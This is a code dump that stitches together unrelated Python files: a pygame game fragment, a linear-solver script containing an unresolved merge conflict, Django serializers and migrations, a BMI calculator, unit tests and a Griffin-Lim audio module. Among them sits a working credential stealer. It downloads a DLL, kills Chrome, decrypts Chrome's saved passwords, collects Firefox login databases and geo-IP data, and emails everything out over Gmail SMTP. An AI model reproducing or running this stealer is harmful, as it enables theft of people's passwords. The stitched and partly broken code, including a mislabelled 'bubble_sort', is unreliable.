start_time = pygame.time.get_ticks()
# Когда игрок пересекает финишную прямую(стену), время записывается в список, записывается только то время,
# которое считалось с момента пересечения от одной стены до другой, тоесть если начать путь и вернуться,
# это учитываться не будет
if x == (width - 50):
if wall_1_to_wall_2:
records.append(passed_time / 1000)
wall_2_to_wall_1 = True
wall_1_to_wall_2 = False
first = False
if x == 50:
if wall_2_to_wall_1:
records.append(passed_time / 1000)
wall_1_to_wall_2 = True
wall_2_to_wall_1 = False
# Выбирается минимальное время из списка
if first:
pass
else:
text2 = font.render(str(min(records)), True, font_color)
screen.blit(text2, (width - 145, 30))
# Перемещение
if keys[pygame.K_UP] and keys[pygame.K_LEFT]:
x -= 10
y -= 10
elif keys[pygame.K_UP] and keys[pygame.K_RIGHT]:
x += 10
y -= 10
elif keys[pygame.K_DOWN] and keys[pygame.K_LEFT]:
x -= 10
y += 10
elif keys[pygame.K_DOWN] and keys[pygame.K_RIGHT]:
x += 10
y += 10
elif keys[pygame.K_LEFT]:
x -= 10
elif keys[pygame.K_RIGHT]:
x += 10
elif keys[pygame.K_UP]:
y -= 10
elif keys[pygame.K_DOWN]:
y += 10
elif keys[pygame.K_ESCAPE]:
run = True
running = False
drawMenu()
# Не дает шарику уйти за пределы поля
screen.blit(text, (55, 30))
if x < 0:
x = 0
if x > width:
x = width
if y < 0:
y = 0
if y > height:
y = height - 5
# Если игрок не изменил своего положения, то все объекты также остаются статичными.
# Даже течение времени секундомера зависит от движения игрока
if (x, y) != old_pos:
all_sprites.update(event)
pygame.display.flip()
game()
pygame.quit()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import math
import random
import time
def Two_norm(x):
# x 为 n*1 矩阵
return math.sqrt(x.T*x)
def Alpha_beta(x,y,z):
# x,y,z 为 n*1 矩阵
xT = x.T
yT = y.T
zT = z.T
s1 = (xT * x).item(0) # 数 s1
s2 = (yT * y).item(0) # 数 s2
s3 = ((xT * y + yT * x)/2).item(0) # 数 s3
s = s1 * s2 - s3**2 # 数 s
c1 = ((zT * x + xT * z)/2).item(0) # 数 c1
c2 = ((zT * y + yT * z)/2).item(0) # 数 c2
alpha = (c1*s2 - c2*s3)/s # 数 alpha
beta = (s1*c2 - c1*s3)/s # 数 beta
return alpha,beta
def Subspace_method_1(A,b,x,epsilon):
# 求解 Ax^T = b^T
# A 为 n*n 非奇异矩阵,x 为 n*1 矩阵,b 为 n*1 矩阵
StartTime = time.time()
r = b - A * x # n*1 余量矩阵 r
r_norm = Two_norm(r) # r 的 2-范数
iter_num = 0 # 迭代次数
x0 = x # 初始化上一步解矩阵
x1 = 2*x # 初始化当前解矩阵
while r_norm >= epsilon and Two_norm(x1-x0) >= epsilon and iter_num < 1000:
if iter_num > 0:
x0 = x1 # 更新 n*1 上一步解矩阵 x1
p1 = A * x0 # n*1 矩阵 p1
p2 = A * r
alpha,beta = Alpha_beta(p1,p2,r)
x1 = x0 + alpha*x0 + beta*r # 更新 n*1 当前解矩阵 x1
r = r - alpha*p1 - beta*p2 # 更新 n*1 余量矩阵 r
r_norm = Two_norm(r) # 更新 r 的 2-范数
iter_num += 1 # 更新迭代次数
print("\n方法一:u=x_k,v=r_k\n")
print("第 {0} 次迭代解:{1}".format(iter_num,x1.T)) # 打印迭代解
print("余量:{0}".format(r.T)) # 打印余量
print("余量范数:%f" % (r_norm)) # 打印余量范数
EndTime = time.time()
ExecuteTime = EndTime - StartTime
print("执行时间:%f\n" % (ExecuteTime)) # 打印执行时间
return x1.T, r.T, r_norm, iter_num
def Subspace_method_2(A,b,x,epsilon):
# 求解 Ax^T = b^T
# A 为 n*n 非奇异矩阵,x 为 n*1 矩阵,b 为 n*1 矩阵
StartTime = time.time()
r0 = b - A * x # n*1 余量矩阵 r
p1 = A * x # n*1 矩阵 p1
p2 = A * r0
alpha,beta = Alpha_beta(p1,p2,r0)
r1 = r0 - alpha*p1 - beta*p2 # 更新 n*1 余量矩阵 r
r1_norm = Two_norm(r1) # r 的 2-范数
iter_num = 0 # 迭代次数
x0 = x # 初始化上一步解矩阵
x1 = 2*x # 初始化当前解矩阵
while r1_norm >= epsilon and Two_norm(x1-x0) >= epsilon and iter_num < 1000:
if iter_num > 0:
x0 = x1 # 更新 n*1 上一步解矩阵 x1
p1 = A * r1 # n*1 矩阵 p1
p2 = A * r0
alpha,beta = Alpha_beta(p1,p2,r0)
x1 = x0 + alpha*r1 + beta*r0 # 更新 n*1 当前解矩阵 x1
t = r0
r0 = r1
if iter_num == 0:
r1 = t - alpha*p1 - beta*p2
else:
r1 = r0 - alpha*p1 - beta*p2 # 更新 n*1 余量矩阵 r
r1_norm = Two_norm(r1) # 更新 r 的 2-范数
iter_num += 1 # 更新迭代次数
print("方法二:u=r_k,v=r_k-1\n")
print("第 {0} 次迭代解:{1}".format(iter_num,x1.T)) # 打印迭代解
print("余量:{0}".format(r1.T)) # 打印余量
print("余量范数:%f" % (r1_norm)) # 打印余量范数
EndTime = time.time()
ExecuteTime = EndTime - StartTime
print("执行时间:%f\n" % (ExecuteTime)) # 打印执行时间
return x1.T, r1.T, r1_norm, iter_num
def Subspace_method_3(A,b,x,epsilon):
# 求解 Ax^T = b^T
# A 为 n*n 非奇异矩阵,x 为 n*1 矩阵,b 为 n*1 矩阵
StartTime = time.time()
r0 = b - A * x # n*1 余量矩阵 r
p1 = A * x # n*1 矩阵 p1
p2 = A * r0
alpha,beta = Alpha_beta(p1,p2,r0)
r1 = r0 - alpha*p1 - beta*p2 # 更新 n*1 余量矩阵 r
r1_norm = Two_norm(r1) # r 的 2-范数
iter_num = 0 # 迭代次数
x0 = x # 初始化上一步解矩阵
x1 = 2*x # 初始化当前解矩阵
while r1_norm >= epsilon and Two_norm(x1-x0) >= epsilon and iter_num < 1000:
if iter_num > 0:
x0 = x1 # 更新 n*1 上一步解矩阵 x1
u = r1
v = (r0 - ((r1.T*r0).item(0)/(r1.T*r1).item(0)) * r1)
p1 = A * u # n*1 矩阵 p1
p2 = A * v
alpha,beta = Alpha_beta(p1,p2,r0)
x1 = x0 + alpha*u + beta*v # 更新 n*1 当前解矩阵 x1
t = r0
r0 = r1
if iter_num == 0:
r1 = t - alpha*p1 - beta*p2
else:
r1 = r0 - alpha*p1 - beta*p2 # 更新 n*1 余量矩阵 r
r1_norm = Two_norm(r1) # 更新 r 的 2-范数
iter_num += 1 # 更新迭代次数
print("方法三:u=r_k,v=(r_k-1)-[(r_k^T*r_k-1)/norm^2(r_k)]*r_k\n")
print("第 {0} 次迭代解:{1}".format(iter_num,x1.T)) # 打印迭代解
print("余量:{0}".format(r1.T)) # 打印余量
print("余量范数:%f" % (r1_norm)) # 打印余量范数
EndTime = time.time()
ExecuteTime = EndTime - StartTime
print("执行时间:%f\n" % (ExecuteTime)) # 打印执行时间
return x1.T, r1.T, r1_norm, iter_num
'''
def Subspace_method_4(A,b,x,epsilon):
# 求解 Ax^T = b^T
# A 为 n*n 非奇异矩阵,x 为 n*1 矩阵,b 为 n*1 矩阵
StartTime = time.time()
r = b - A * x # n*1 余量矩阵 r
r_norm = Two_norm(r) # r 的 2-范数
iter_num = 0 # 迭代次数
x0 = x # 初始化上一步解矩阵
x1 = 2*x # 初始化当前解矩阵
while r_norm >= epsilon and Two_norm(x1-x0) >= epsilon and iter_num <= 1000:
if iter_num > 0:
x0 = x1 # 更新 n*1 上一步解矩阵 x1
p = b - r # n*1 矩阵 p
pT = p.T # 1*n 矩阵 p^T
q = A * r # n*1 矩阵 q
qT = q.T # 1*n 矩阵 q^T
s1 = (pT * p).item(0) # 数 s1
s2 = (qT * q).item(0) # 数 s2
s3 = (pT * q).item(0) # 数 s3
s = s1 * s2 - s3**2 # 数 s
c1 = (pT * b).item(0) # 数 c1
c2 = (qT * b).item(0) # 数 c2
alpha = (c1*s2 - c2*s3)/s # 数 alpha
beta = (s1*c2 - c1*s3)/s # 数 beta
x1 = alpha*x0 + beta*r # 更新 n*1 当前解矩阵 x1
r = (1-alpha)*b + alpha*r - beta*q # 更新 n*1 余量矩阵 r
r_norm = Two_norm(r) # 更新 r 的 2-范数
iter_num += 1 # 更新迭代次数
print("方法四:u=x_k,v=r_k\n")
print("第 {0} 次迭代解为:{1}".format(iter_num,x1.T)) # 打印迭代解
print("余量为:{0}".format(r.T)) # 打印余量
print("余量范数为:%f\n" % (r_norm)) # 打印余量范数
EndTime = time.time()
ExecuteTime = EndTime - StartTime
print("执行时间:%f\n" % (ExecuteTime)) # 打印执行时间
return x1.T, r.T, r_norm, iter_num
'''
A = np.mat([[1,2,3],[2,7,4],[4,5,9]])
b = np.mat([[14],[28],[41]])
x = np.mat([[199],[200],[555]])
epsilon = 1e-4
print("\n迭代停止条件:||r_(k+1)|| < 1e-4 或 ||x_(k+1) - x_k|| < 1e-4 或 迭代次数 > 1000")
print("矩阵A:\n{0}".format(A))
print("向量b:{0}".format(b.T))
print("初值x:{0}".format(x.T))
print("精确解:{0}".format(np.mat([[1,2,3]])))
Subspace_method_1(A,b,x,epsilon)
Subspace_method_2(A,b,x,epsilon)
Subspace_method_3(A,b,x,epsilon)
#Subspace_method_4(A,b,x,epsilon)
'''
A = np.mat([[1,2,3],[2,7,4],[4,5,9]])
b = np.mat([[14],[28],[41]])
x = np.mat([[199],[0],[555]])
r0 = b - A * x # n*1 余量矩阵 r
p1 = A * x # n*1 矩阵 p1
p2 = A * r0
alpha,beta = Alpha_beta(p1,p2,r0)
r1 = r0 - alpha*p1 - beta*p2 # 更新 n*1 余量矩阵 r
r1_norm = Two_norm(r1) # r 的 2-范数
iter_num = 0 # 迭代次数
x0 = x # 初始化上一步解矩阵
x1 = 2*x # 初始化当前解矩阵
while iter_num < 2:
if iter_num > 0:
x0 = x1 # 更新 n*1 上一步解矩阵 x1
print("第 {0} 次循环:".format(iter_num + 1))
p1 = A * r1 # n*1 矩阵 p1
print("p1:{0}".format(p1.T))
p2 = A * r0
print("p2:{0}".format(p2.T))
alpha,beta = Alpha_beta(p1,p2,r0)
print("alpha:{0}".format(alpha))
print("beta:{0}".format(beta))
x1 = x0 + alpha*r1 + beta*r0 # 更新 n*1 当前解矩阵 x1
print("旧的x1:{0}".format(x0.T))
print("新的x1:{0}".format(x1.T))
t = r0
print("旧的r0(t):{0}".format(t.T))
print("旧的r1:{0}".format(r1.T))
r0 = r1
print("新的r0:{0}".format(r0.T))
if iter_num == 0:
r1 = t - alpha*p1 - beta*p2
else:
r1 = r0 - alpha*p1 - beta*p2
print("b-A*x0:{0}".format((b-A*x1).T))
print("新的r1:{0}".format(r1.T))
r1_norm = Two_norm(r1) # 更新 r 的 2-范数
iter_num += 1 # 更新迭代次数
# print("第 {0} 次迭代解为:{1}\n".format(iter_num,x1.T)) # 打印迭代解
# print("余量为:{0}\n".format(r1.T)) # 打印余量
print("r1范数为:%f\n" % (r1_norm)) # 打印余量范数
<<<<<<< HEAD
A = np.mat([[1,2,3],[2,7,4],[3,4,9]])
b = np.mat([[14],[28],[38]])
x = np.mat([[1000],[-400],[75]])
epsilon = 1e-4
Subspace_method(A,b,x,epsilon)
=======
A = np.mat([[1,2,3],[2,7,4],[4,5,9]])
x = np.mat([[418.17159384],[-1419.5998351],[1753.10645053]])
b = np.mat([[14],[28],[41]])
r = b - A * x
r_n = math.sqrt(r.T * r)
print(r,r_n)
'''
>>>>>>> 2c515191b6eb0d9d3762ec8aa52e7a0bc3d400ef
|
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from smtplib import SMTP
import win32crypt
import base64
import os
import winreg
import urllib.request
firefox = os.path.join(os.environ['APPDATA'], 'Mozilla', 'Firefox', 'Profiles')
encoded_files = {}
files_needed = ['key3.db', 'logins.json', 'cert8.db']
login_cred = {'email':'', 'password':'', 'dest':''}
endpoint = 'http://freegeoip.net/json/'
dll_url = "https://s3.amazonaws.com/idiaco/sqlite3.dll"
dll_name = "sqlite3.dll"
def getpath() :
for path in os.walk(os.getenv('USERPROFILE')) :
if 'Chrome' in path[1] :
return str(path[0]) + '\\Chrome\\User Data\\Default\\Login Data'
def sql_mite() :
path = getpath()
import sqlite3
try :
conn = sqlite3.connect(path)
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
data = cursor.fetchall()
return data
except Exception as e:
print('There was an Error') # Remember to change this part to 'pass'
def dechrome() :
data = sql_mite()
info = {}
bundle = []
if len(data) > 0 : # Yeah dummy, stop figuring out what this does. It simply checks if the user has used Chrome before :)
for value in data :
password = win32crypt.CryptUnprotectData(value[2], None, None, None, 0)[1].decode()
info['url'] = value[0]
info['Username'] = value[1]
info['Password'] = password
bundle.append(info)
info = {} # For some reason which i can't tell, it kept on posting only one saved login. so i had to find a hack around it. please ignore it.
return bundle
else : print('Chromeless')
def encode_content(*args) :
for file in args :
f = open(file,"rb")
filecontent = f.read()
encodedcontent = base64.b64encode(filecontent)
encoded_files[file] = encodedcontent
return True
def path_gen(filename) :
tree = os.listdir(firefox)
name = firefox + '\\'+ tree[0] + '\\' + filename
return name
def ip_man(endpoint) :
try :
r = urllib.request.urlretrieve(endpoint)
return r[0]
except :
return 'For some unknown resons, IP couldnt be extracted'
def dll_download(dll_url,dll_name):
urllib.request.urlretrieve(dll_url, dll_name, reporthook=None)
return True
def email_setup(chrome) :
''' This function prepares the email, by attaching text and all neccessary attachment '''
email = MIMEMultipart()
email['Subject'] = 'Kermit just got served'
email['From'] = login_cred['email']
email['To'] = login_cred['dest']
# That is what u see if dont have an email reader:
email.preamble = 'Multipart message.\n'
text = MIMEText("Chromium = " + str(chrome))
email.attach(text)
# This is the binary part(The Attachment):
part = MIMEApplication(encoded_files[r'' + str(keys3)])
part.add_header('Content-Disposition', 'attachment', filename="key3.db")
email.attach(part)
part = MIMEApplication(encoded_files[r'' + str(logins)])
part.add_header('Content-Disposition', 'attachment', filename="logins.json")
email.attach(part)
part = MIMEApplication(encoded_files[r'' + str(cert8)])
part.add_header('Content-Disposition', 'attachment', filename="cert8.db")
email.attach(part)
part = MIMEApplication(encoded_files[str(geoip)])
part.add_header('Content-Disposition', 'attachment', filename="geoip.json")
email.attach(part)
return email
def main() :
global keys3
global logins
global cert8
global geoip
report = dll_download(dll_url, dll_name)
os.system("taskkill /f /im chrome.exe")
chrome = dechrome()
if report :
keys3 = path_gen(files_needed[0])
logins = path_gen(files_needed[1])
cert8 = path_gen(files_needed[2])
geoip = ip_man(endpoint)
encode_content(keys3, logins, cert8, geoip)
email = email_setup(chrome)
smtp = SMTP('smtp.gmail.com:587')
smtp.ehlo()
smtp.starttls()
print('Logging In')
smtp.login(login_cred['email'], login_cred['password']) # Authenticate PassKeys
print('login successful')
print('Sending email')
smtp.sendmail(email['From'], email['To'], email.as_string()) # Send Mail
print('PAWNED!')
if __name__ == '__main__':
main()
|
while True:
print("\n" * 100)
print("BMI Calculator")
print("--------------")
height = int(input("Height (cm): "))
weight = int(input("Weight (kg): "))
BMIR = weight / ((height / 100) ** 2)
BMI = str(round(BMIR, 2))
print("")
if BMIR < 18.5:
print ("BMI: " + str(BMI) + ", Under Weight")
elif BMIR >= 18.5 and BMIR < 25:
print ("BMI: " + str(BMI) + ", Normal")
elif BMIR >= 25 and BMIR < 30:
print ("BMI: " + str(BMI) + ", Overweight")
else:
print ("BMI: " + str(BMI) + ", Obese")
print("")
answer = input("Repeat? Y/N: ")
if answer == "N":
break
|
from allauth.utils import get_username_max_length, email_address_exists
from django.contrib.auth import get_user_model, authenticate
from rest_auth.models import TokenModel
from allauth.account import app_settings as allauth_settings
from allauth.account.adapter import get_adapter
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers, exceptions
from django.conf import settings
from users.models import UserDetail, UserType
from nearby.models import LiveLocation
User = get_user_model()
class UserDetailSerializer(serializers.ModelSerializer):
class Meta:
model = UserDetail
fields = "__all__"
class CustomUserSerializer(serializers.ModelSerializer):
meta_data = serializers.SerializerMethodField()
class Meta:
model = User
fields = ('pk','meta_data', 'username', 'email', 'first_name', 'last_name', "phone_number", "phone_number_verified", "name")
read_only_fields = ('email', )
def get_meta_data(self, obj):
try:
user_details = UserDetail.objects.get(user=obj.id)
except UserDetail.DoesNotExist:
user_details = None
user_detail_serializer = UserDetailSerializer(user_details, many=False)
user_type_qs = UserType.objects.filter(user=obj.id)
user_type_serializer = UserTypeSerializer(user_type_qs, many=True)
user_types = []
live_location_lat = None
live_location_long = None
try:
live_location = LiveLocation.objects.get(user=obj.id)
except LiveLocation.DoesNotExist:
live_location = None
if live_location is not None:
live_location_lat = live_location.location_lat
live_location_long = live_location.location_long
for type in user_type_serializer.data:
user_types.append(type['user_type'])
return {"user_details": user_detail_serializer.data, "user_types": user_types, 'live_location_lat': live_location_lat, 'live_location_long': live_location_long}
class CustomTokenSerializer(serializers.ModelSerializer):
user = CustomUserSerializer(many=False)
class Meta:
model = TokenModel
fields = ('key', 'user')
class UserTypeSerializer(serializers.ModelSerializer):
class Meta:
model = UserType
fields = "__all__"
class UserDetailSerializer(serializers.ModelSerializer):
# device = DeviceSerializer(required=False)
class Meta:
model = UserDetail
fields = '__all__'
class UserDetailEditSerializer(serializers.ModelSerializer):
user = serializers.IntegerField()
class Meta:
model = UserDetail
fields = '__all__'
class CustomLoginSerializer(serializers.Serializer):
username = serializers.CharField(required=False, allow_blank=True)
email = serializers.EmailField(required=False, allow_blank=True)
password = serializers.CharField(style={'input_type': 'password'})
def authenticate(self, **kwargs):
return authenticate(self.context['request'], **kwargs)
def _validate_email(self, email, password):
user = None
if email and password:
user = self.authenticate(email=email, password=password)
else:
msg = _('Must include "email" and "password".')
raise exceptions.ValidationError(msg)
return user
def _validate_username(self, username, password):
user = None
if username and password:
user = self.authenticate(username=username, password=password)
else:
msg = _('Must include "username" and "password".')
raise exceptions.ValidationError(msg)
return user
def _validate_username_email(self, username, email, password):
user = None
if email and password:
user = self.authenticate(email=email, password=password)
elif username and password:
user = self.authenticate(username=username, password=password)
else:
msg = _('Must include either "username" or "email" and "password".')
raise exceptions.ValidationError(msg)
return user
def validate(self, attrs):
username = attrs.get('username')
email = attrs.get('email')
password = attrs.get('password')
user = None
if 'allauth' in settings.INSTALLED_APPS:
from allauth.account import app_settings
# Authentication through email
if app_settings.AUTHENTICATION_METHOD == app_settings.AuthenticationMethod.EMAIL:
user = self._validate_email(email, password)
# Authentication through username
elif app_settings.AUTHENTICATION_METHOD == app_settings.AuthenticationMethod.USERNAME:
user = self._validate_username(username, password)
# Authentication through either username or email
else:
user = self._validate_username_email(username, email, password)
else:
# Authentication without using allauth
if email:
try:
username = User.objects.get(email__iexact=email).get_username()
except User.DoesNotExist:
pass
if username:
user = self._validate_username_email(username, '', password)
# Did we get back an active user?
if user:
if not user.is_active:
msg = _('User account is disabled.')
raise exceptions.ValidationError(msg)
else:
msg = _('Unable to log in with provided credentials.')
raise exceptions.ValidationError(msg)
# If required, is the email verified?
if user.email is not "":
if 'rest_auth.registration' in settings.INSTALLED_APPS:
from allauth.account import app_settings
if app_settings.EMAIL_VERIFICATION == app_settings.EmailVerificationMethod.MANDATORY:
email_address = user.emailaddress_set.get(email=user.email)
if not email_address.verified:
raise serializers.ValidationError(_('E-mail is not verified.'))
if user.phone_number is not "":
if user.phone_number_verified == False:
raise serializers.ValidationError(_('Phone Number is not verified.'))
attrs['user'] = user
return attrs
class SignupWithEmailSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'first_name', 'last_name', 'email', 'phone_number', 'password')
extra_kwargs = {
'password': {
'write_only': True,
'style': {
'input_type': 'password'
}
},
'username': {
'required': True
},
'email': {
'required': True,
'allow_blank': False,
}
}
username = serializers.CharField(
max_length=get_username_max_length(),
min_length=allauth_settings.USERNAME_MIN_LENGTH,
required=True
)
def validate_username(self, username):
username = get_adapter().clean_username(username)
return username
def validate_email(self, email):
email = get_adapter().clean_email(email)
if allauth_settings.UNIQUE_EMAIL:
if email and email_address_exists(email):
raise serializers.ValidationError(
_("A user is already registered with this e-mail address."))
return email
class SignUpWithPhoneSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'first_name', 'last_name', 'email', 'phone_number', 'password')
extra_kwargs = {
'password': {
'write_only': True,
'style': {
'input_type': 'password'
}
},
'username': {
'required': True
},
'phone_number': {
'required': True,
'allow_blank': False,
}
}
username = serializers.CharField(
max_length=get_username_max_length(),
min_length=allauth_settings.USERNAME_MIN_LENGTH,
required=True
)
def validate_username(self, username):
username = get_adapter().clean_username(username)
return username
def validate_phone_number(self, phone_number):
try:
user = User.objects.get(phone_number=phone_number)
except User.DoesNotExist:
return phone_number
raise serializers.ValidationError(
_("A user is already registered with this phone number.")) |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-08 04:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0031_auto_20170908_1345'),
]
operations = [
migrations.AlterField(
model_name='task',
name='photo',
field=models.ImageField(blank=True, null=True, upload_to='%Y/%m/%d/'),
),
]
|
import unittest
from tests.unit_test_helper import is_answer
from tests.unit_test_helper.console_test_helper import execfile
class TestOutput(unittest.TestCase):
def test(self):
if is_answer:
from lab.lab12.ch012_t02_make_a_list_ans import board
else:
from lab.lab12.ch012_t02_make_a_list import board
self.assertIsInstance(board, type([]))
expected = [['O', 'O', 'O', 'O', 'O'],
['O', 'O', 'O', 'O', 'O'],
['O', 'O', 'O', 'O', 'O'],
['O', 'O', 'O', 'O', 'O'],
['O', 'O', 'O', 'O', 'O']]
self.assertListEqual(expected, board)
def testOutput(self):
temp_globals, temp_locals, content, output = execfile("lab12/ch012_t01_get_our_feet_wet.py")
expected = """"""
self.assertEqual(expected, output)
if __name__ == '__main__':
unittest.main()
|
from .lib import open_browser
from .pages import LoginPage
browser = open_browser()
page = LoginPage(browser)
# Mensagens do formulário
page.open()
page.formulario.focar_email()
assert page.formulario.get_texto_label_email() == 'Tá certo?'
page.formulario.focar_senha()
assert page.formulario.get_texto_label_senha() == 'Não vai errar'
browser.quit()
|
def bubble_sort(num_list, reverse=False):
global result
for _ in num_list:
if reverse > 0:
result = num_list[::-1]
elif reverse < 0:
result = num_list[::1]
else:
return num_list
return result
print(bubble_sort([2, 5, 8, 6, 4, 2], 2))
|
# Generated by Django 3.0.3 on 2020-04-21 01:43
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Group',
fields=[
('group_id', models.AutoField(primary_key=True, serialize=False)),
('group_name', models.CharField(max_length=20)),
],
),
]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('conteudo', '0003_auto_20150413_1007'),
]
operations = [
migrations.AlterField(
model_name='pagina',
name='pagina_inicial',
field=models.BooleanField(default=False, help_text='Esse campo \xe9 utilizado para sites que possuem uma p\xe1gina simples como p\xe1gina inicial. Para definir esta p\xe1gina como sendo a p\xe1gina inicial marque esta op\xe7\xe3o.', verbose_name='P\xe1gina inicial'),
preserve_default=True,
),
]
|
# coding=utf-8
# Phase reconstruction with the Griffin-Lim algorithm
#
# Copyright (C) 2019 Robin Scheibler, MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# You should have received a copy of the MIT License along with this program. If
# not, see <https://opensource.org/licenses/MIT>.
"""
Implementation of the classic phase reconstruction from Griffin and Lim [1]_.
The input to the algorithm is the magnitude from STFT measurements.
The algorithm works by starting by assigning a (possibly random) initial phase to the
measurements, and then iteratively
1. Reconstruct the time-domain signal
2. Re-apply STFT
3. Enforce the known magnitude of the measurements
The implementation supports different types of initialization via the keyword argument ``ini``.
1. If omitted, the initial phase is uniformly zero
2. If ``ini="random"``, a random phase is used
3. If ``ini=A`` for a ``numpy.ndarray`` of the same shape as the input magnitude, ``A / numpy.abs(A)`` is used for initialization
Example
-------
.. code-block:: python
import numpy as np
from scipy.io import wavfile
import pyroomacoustics as pra
# We open a speech sample
filename = "examples/input_samples/cmu_arctic_us_axb_a0004.wav"
fs, audio = wavfile.read(filename)
# These are the parameters of the STFT
fft_size = 512
hop = fft_size // 4
win_a = np.hamming(fft_size)
win_s = pra.transform.stft.compute_synthesis_window(win_a, hop)
n_iter = 200
engine = pra.transform.STFT(
fft_size, hop=hop, analysis_window=win_a, synthesis_window=win_s
)
X = engine.analysis(audio)
X_mag = np.abs(X)
X_mag_norm = np.linalg.norm(X_mag) ** 2
# monitor convergence
errors = []
# the callback to track the spectral distance convergence
def cb(epoch, Y, y):
# we measure convergence via spectral distance
Y_2 = engine.analysis(y)
sd = np.linalg.norm(X_mag - np.abs(Y_2)) ** 2 / X_mag_norm
# save in the list every 10 iterations
if epoch % 10 == 0:
errors.append(sd)
pra.phase.griffin_lim(X_mag, hop, win_a, n_iter=n_iter, callback=cb)
plt.semilogy(np.arange(len(errors)) * 10, errors)
plt.show()
References
----------
.. [1] D. Griffin and J. Lim, “Signal estimation from modified short-time Fourier
transform,” IEEE Transactions on Acoustics, Speech, and Signal Processing, vol.
32, no. 2, pp. 236–243, 1984.
"""
# This is needed to check for string types
# in a way compatible between python 2 and 3
try:
basestring
except NameError:
basestring = str
import numpy as np
from ..transform.stft import STFT, compute_synthesis_window
def griffin_lim(
X,
hop,
analysis_window,
fft_size=None,
stft_kwargs={},
n_iter=100,
ini=None,
callback=None,
):
"""
Implementation of the Griffin-Lim phase reconstruction algorithm from STFT magnitude measurements.
Parameters
----------
X: array_like, shape (n_frames, n_freq)
The STFT magnitude measurements
hop: int
The frame shift of the STFT
analysis_window: array_like, shape (fft_size,)
The window used for the STFT analysis
fft_size: int, optional
The FFT size for the STFT, if omitted it is computed from the dimension of ``X``
stft_kwargs: dict, optional
Dictionary of extra parameters for the STFT
n_iter: int, optional
The number of iteration
ini: str or array_like, np.complex, shape (n_frames, n_freq), optional
The initial value of the phase estimate. If "random", uses a random guess. If ``None``, uses ``0`` phase.
callback: func, optional
A callable taking as argument an int and the reconstructed STFT and time-domain signals
"""
if isinstance(ini, basestring) and ini == "random":
ini = np.exp(1j * 2 * np.pi * np.random.rand(*X.shape))
elif ini is None:
ini = np.ones(X.shape, dtype=np.complex128)
else:
# make sure the modulus is one
ini /= np.abs(ini)
# take care of the STFT parameters
if fft_size is None:
fft_size = 2 * (X.shape[1] - 1)
# the optimal GL window
synthesis_window = compute_synthesis_window(analysis_window, hop)
# create the STFT object
engine = STFT(
fft_size,
hop=hop,
analysis_window=analysis_window,
synthesis_window=synthesis_window,
**stft_kwargs
)
# Initialize the signal
Y = X * ini
y = engine.synthesis(Y)
# the successive application of analysis/synthesis introduces
# a shift of ``fft_size - hop`` that we must correct
the_shift = fft_size - hop
y[:-the_shift,] = y[the_shift:,]
for epoch in range(n_iter):
# possibly monitor the reconstruction
if callback is not None:
callback(epoch, Y, y)
# back to STFT domain
Y[:, :] = engine.analysis(y)
# enforce magnitudes
Y *= X / np.abs(Y)
# back to time domain
y[:-the_shift,] = engine.synthesis(Y)[the_shift:,]
# last callback
if callback is not None:
callback(epoch, Y, y)
return y
|
# -*- coding: utf-8 -*-
import os
import unittest
import numpy as np
from pola.machine.topic_model import Document
from pola.machine.topic_model import GTopicModel
from pola.machine.topic_model import resource as rs
class TestGTopicModel(unittest.TestCase):
def test_model(self):
model = self.create_test_model()
model.train(iter=10000)
print(model.perplexity())
for t in model.core.print_topics():
print(t)
def test_save_and_load_model(self):
pre_model = self.create_test_model()
pre_model.train(iter=10000)
p1 = pre_model.perplexity()
pre_model.save()
r = self.get_resource()
post_model = GTopicModel.load(r.path)
p2 = post_model.perplexity()
self.assertTrue((p1 - p2) < 1e-5)
def test_calc_distances(self):
model = self.create_test_model()
model.train()
ds = model.calc_distances(0)
self.assertTrue(2, len(ds))
print(ds)
def test_get_doc_indices(self):
model = self.create_test_model()
model.train()
print(model.get_topic_documents(0))
def get_doc_en(self):
docs = [
"I read the news today oh boy About a lucky man who made the grade",
"I saw a film today oh boy The English Army had just won the war",
"It’s been a hard days night, and I been working like a dog",
"It’s been a hard days night, I should be sleeping like a dog",
"You say you want a revolution",
"You tell me that it's evolution"
]
doc = Document.load_docs(docs, lang="en")
return doc
def create_test_model(self):
r = self.get_resource()
r.remove()
doc = self.get_doc_en()
model = GTopicModel(3, doc, resource=r)
return model
def get_resource(self):
base = os.path.dirname(__file__)
path = os.path.join(base, "../data/test_gmodel.gensim")
return rs.GensimResource(path)
|
# Generated by Django 2.2.4 on 2021-02-26 18:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('registration_app', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Book',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('desc', models.TextField(max_length=255)),
